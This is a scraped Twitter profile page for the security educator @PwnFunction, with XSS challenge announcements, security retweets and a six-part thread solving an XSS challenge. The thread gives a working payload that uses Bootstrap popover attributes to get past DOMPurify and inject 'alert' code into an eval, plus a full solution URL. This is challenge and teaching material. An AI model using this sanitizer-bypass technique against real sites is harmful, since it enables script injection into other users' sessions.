Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @PwnFunction
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @PwnFunction
-
Prikvačeni tweet
Yo hackers! I've built a small website that has some
#XSS challenges.
http://xss.pwnfunction.com
The main challenge for the week is `WW3`
All upcoming challenges will be hosted there, so stay tuned :)
Would love to know what you guys think. Have fun!pic.twitter.com/0vGboYQIY7
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
New #XSS challenge "Jason Bourne" https://xss.pwnfunction.com/challenges/bourne/ …pic.twitter.com/4dvvp4PuEK
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
PwnFunction proslijedio/la je Tweet
Last call! TODAY at a 1 PM EST Webinar on "Shellcode For The Masses" with the
@ethicalhacker Network, I will introduce what#shellcode is, how it's used, discuss some binary#exploitation techniques and security mitigations, and showcase some demos!https://www.ethicalhacker.net/eh-net-tv/eh-net-live/webinar-shellcode-for-the-masses/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
PwnFunction proslijedio/la je Tweet
I started writing solutions to my challenges on
#justctf quite a time ago but haven't had enough time to finish it. I decided to publish these very chaotic writeups to Dominoes, Scam Generator and p&q service.#xssearch#bugbountytiphttps://hackmd.io/@terjanq/justctf_writeups …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Solutions to the
#XSS challenge `WW3` on https://xss.pwnfunction.com/challenges/ww3/ Any bugs/typos, lemme know :)pic.twitter.com/uJD91nzvl3
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Thanks for the 10k subs on YouTube! Means a lot to me :)
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
PwnFunction proslijedio/la je Tweet
I clicked on this video because of clickbait, and it turned out to contain actual great advice!https://www.youtube.com/watch?v=M6NsEDwHHiE …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
PwnFunction proslijedio/la je Tweet
My courses are going back to GitHub and off of my website. It was really annoying running them on my website. The reverse engineering course is getting a revamp soon and a basic exploit dev course is being worked on.https://github.com/0xZ0F/Z0FCourse_ReverseEngineering …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
PwnFunction proslijedio/la je Tweet
Voting is now open for the top 10 new web hacking techniques of 2019:https://portswigger.net/polls/top-10-web-hacking-techniques-2019 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[NEW]
#XSS Challenge https://xss.pwnfunction.com/challenges/ww3.html … DM me if you solved it :) Have fun! * Solutions, 1 week from now.Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
PwnFunction proslijedio/la je Tweet
First #wasm security blogpost of 2020
Some people ask me, so here is how to start fuzzing #WebAssembly APIs of#browser JavaScript engines like Chrome/V8. In this blogpost, I'm using:
Dharma/Domato
Chrome/v8 ASan pre-built
Honggfuzz ;)https://webassembly-security.com/fuzzing-wasm-javascript-dharma-chrome-v8/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
PwnFunction proslijedio/la je Tweet
Loved the challenge, it was definitely a good learning experience for me. To better digest the solution, I broke it down and explained it in my own words in a slightly more verbose way (same exploit though). If anyone wants to read it, they can find it athttps://github.com/Hypro999/CTF/blob/master/Wargames/Misc/pwnfunction-xsschallenge/solution.md#my-subsequent-explanation-and-takeaways …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
[5/6] resulting number innerHTML will be `'<some popover template html code>'-alert(1337)//<some popover template html code>` now it's valid javascript that get's eval-ed.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[4/6] So we just need to make it a valid javascript, because it's being eval-ed. number=' name=<button data-toggle=popover data-container=number data-content="'-alert(1337)//">
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[3/6] If number=7 name=<button data-toggle=popover data-container=number data-content="blah blah"> resulting number innerHTML will be `7<some popover template html code>blah blah<some popover template html code>`
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[2/6] Clearly the `number` param is eval-ed, so before it lands inside `eval`, can we append some data to it? To do this bootstrap has a nice feature using popovers like using `data-container` (https://getbootstrap.com/docs/4.0/components/popovers/ …), so we set it to `number` tag.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
[1/6] * 2 parameters `number` & `name` * `number` can be only 1 character * `name` can be anything, but DOMPurify is used to sanitize * The site uses bootstrap * Goal is to make our input somehow land inside the eval
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
The
#XSS challenge has ended https://twitter.com/PwnFunction/status/1211406031294586880 … Solution: http://vulnerableweb[.]site/xss/xss.php?number='&name=<button id=keanu data-toggle=popover data-container=number data-content="'-alert(document.domain)//"> (see reply for explanation)Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
Have fun!
* Solution(s) on 1st.